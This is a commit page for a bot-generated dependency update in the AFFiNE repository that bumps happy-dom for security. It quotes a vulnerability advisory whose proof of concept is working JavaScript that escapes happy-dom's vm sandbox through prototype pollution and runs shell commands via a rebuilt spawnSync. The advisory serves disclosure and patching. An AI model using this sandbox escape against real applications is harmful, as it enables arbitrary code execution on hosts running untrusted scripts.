Morph MORPH
SIGN IN SIGN UP
toeverything / AFFiNE UNCLAIMED

There can be more than Notion and Miro. AFFiNE(pronounced [ษ™โ€˜fain]) is a next-gen knowledge base that brings planning, sorting and creating all together. Privacy first, open-source, customizable and ready to use.

0 0 4 TypeScript

chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)

This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) |
[`20.0.0` ->
`20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/happy-dom/20.0.2?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/happy-dom/20.0.0/20.0.2?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5)

### Summary
The mitigation proposed in GHSA-37j7-fg3j-429f for disabling
eval/Function when executing untrusted code in happy-dom does not
suffice, since it still allows prototype pollution payloads.

### Details
The untrusted script and the rest of the application still run in the
same Isolate/process, so attackers can deploy prototype pollution
payloads to hijack important references like "process" in the example
below, or to hijack control flow via flipping checks of undefined
property. There might be other payloads that allow the manipulation of
require, e.g., via (univeral) gadgets
(https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).

### PoC
Attackers can pollute builtins like Object.prototype.hasOwnProperty() to
obtain important references at runtime, e.g., "process". In this way,
attackers might be able to execute arbitrary commands like in the
example below via spawn().

```js
import { Browser } from "happy-dom";

const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});

page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
    function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} 
    this.constructor.constructor.__proto__.__proto__.toString = f;
    this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
    // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
    
</script>
<body>Hello world!</body></html>`;

await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));
```

### Impact
Arbitrary code execution via breaking out of the Node.js' vm isolation.

### Recommended Immediate Actions
Users can freeze the builtins in the global scope to defend against
attacks similar to the PoC above. However, the untrusted code might
still be able to retrieve all kind of information available in the
global scope and exfiltrate them via fetch(), even without prototype
pollution capabilities. Not to mention side channels caused by the
shared process/isolate. Migration to
[isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is
suggested instead.

Cris from the Endor Labs Security Research Team, who has worked
extensively on JavaScript sandboxing in the past, submitted this
advisory.

---

### Release Notes

<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>

###
[`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2)

##### :construction\_worker\_man: Patch fixes

- Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer`
- By **[@&#8203;capricorn86](https://redirect.github.com/capricorn86)**
in task
[#&#8203;1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934)

###
[`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1)

##### :construction\_worker\_man: Patch fixes

- Adds warning for environment with unfrozen intrinsics (builtins) when
JavaScript evaluation is enabled- By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932)
- A security advisory has been reported showing that the recommended
preventive measure of running Node.js with
`--disallow-code-generation-from-strings` wasn't enough to protect
against attackers escaping the VM context and accessing process-level
functions. Big thanks to
[@&#8203;cristianstaicu](https://redirect.github.com/cristianstaicu) for
reporting this!
- The documentation for how to run Happy DOM with JavaScript evaluation
enabled in a safer way has been updated. Read more about it in the
[Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning)

</details>

---

### Configuration

๐Ÿ“… **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

๐Ÿšฆ **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

โ™ป **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

๐Ÿ”• **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
R
renovate[bot] committed
a47042cbd59a93c8a7227a20c43f9f59937f251e
Parent: 2c44d3a
Committed by GitHub <noreply@github.com> on 10/21/2025, 4:13:36 PM